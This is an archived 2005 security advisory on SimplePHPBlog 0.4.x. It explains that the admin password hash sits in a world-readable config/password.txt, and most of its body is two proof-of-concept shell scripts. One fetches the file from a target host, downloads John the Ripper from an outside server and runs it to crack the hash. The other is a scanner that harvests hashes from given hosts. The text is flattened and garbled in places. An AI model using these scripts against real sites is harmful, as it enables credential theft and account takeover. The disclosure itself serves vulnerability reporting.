SimplePHPBlog 0.4.0 <= Remote Password Disclosure

2005-07-08T00:00:00
ID SECURITYVULNS:DOC:9101
Type securityvulns
Reporter Securityvulns
Modified 2005-07-08T00:00:00

Description

       __       .__

__ ||_ | | .__. \____ \ | \____ \| |< | | | |> > | | |> > |\ | | _/\| | /|____/ ____| || \__|| \/ Where is the security? ...

Security Advisory 2005-0x00

Authors......... pjphem && LazyCrs Date............ 07/07/2005 Vendor.......... www.simplephpblog.com Type............ SimplePHPBlog 0.4.0 <= Remote Password Disclosure

o The Problem:

bash-3.00# cat install02.php

$result = create_folder( 'config' );

bash-3.00# cat sb_login.php

            // If there&#39;s no password file then need to redirect them.
            $passFile = &#39;config/password.txt&#39;;

            ----------------------------------------------------------------------------------------

            function create_password &#40; $user, $pass &#41; {
            // Generate and store password hash

            $mypasswd = $user.$pass;
            $hashed = crypt&#40;$mypasswd&#41;;

            // Save File
            $filename = &#39;config/password.txt&#39;;
            $result = sb_write_file&#40; $filename, $hashed &#41;;

             ----------------------------------------------------------------------------------------

            function check_password &#40; $user, $pass &#41; {
            // Check password against hashed password file

            $passFile = &#39;config/password.txt&#39;;
            $hashed = sb_read_file&#40; $passFile &#41;;

bash-3.00# ls -l `pwd` |grep config drwxrwxrwx 2 www-data www-data 216 Jul 7 01:13 config

o Proof of concept:

bash-3.00$ cat 0xfuck-phpblog.sh

!/bin/bash

0xfuck-phpblog.sh - SimplePHPBlog Remote Password Disclosure. (for dummy)

0xpjply CONFIDENTIAL - SOURCE MATERIALS

This is published proprietary source code of 0xpjply

(C) COPYRIGHT 0xpjply security guru group, 2005

All Rights Reserved

dummy exploit written by pjphem && infected on July 2005

contact:

pjphem && LazyCrs

pjphem@mybox.it && fLazyCrs@GMail.com

Greetz:

You think you know? You have no idea!

fluffi-

RAFA FREE

echo "" echo "" echo " +++++++++++++++++++++++++++++++++++++++++++++++++++++++++ " echo " =: SimplePHPBlog Remote Password Disclosure. - for dummy := " echo " +++++++++++++++++++++++++++++++++++++++++++++++++++++++++ " echo "" echo " c0de by pjphem " echo "" echo "" echo " vulnerabili Simple php blog 0.4.4 <= " echo "" echo "" echo -n "inserisci un hostname: " ; read hostname ; echo -n "inserisci dir: " ; read dir ; echo "" echo "[] praparando l'ambiente..." mkdir 0xpjply cd 0xpjply echo -t3 "[] OK!" echo "[] Cattura password..." wget http://$hostname/$dir/config/password.txt echo "[] OK!" echo "" echo "" echo "Show password: (md5)" echo "" cat password.txt echo "" rm -rf password.txt echo "" echo -n "Downloading John The Ripper (password decripter) ?? [Y/n] " read Q if [ $Q = y ]; then echo "[] OK!" ; wget http://broly.xelon.it/adv/john.tar.gz else exit 1; fi tar -zxf john.tar.gz cd john echo "" echo "[] Dowloading password.." echo "" wget http://$hostname/$dir/config/password.txt echo "" echo "Done!" echo "" echo "STARING John for decript password.. enJoy" ./jonh password.txt echo "" echo "" bash-3.00$

bash-3.00$ cat 0xfuck-phpblog-scanner.sh

!/bin/bash

Simple tester for phpblog

phpblog 0.4.4 <=

echo "host , directory blog: (ex. test.it blog)" read HOST BLOG lynx -source http://$HOST/$BLOG/config/password.txt | grep $1$ >> 0wn4bl3 bash-3.00$


Scegli il tuo dominio preferito e attiva la tua email! Da oggi l'eMail di superEva e' ancora piu' veloce e ricca di funzioni! http://webmail.supereva.it/new/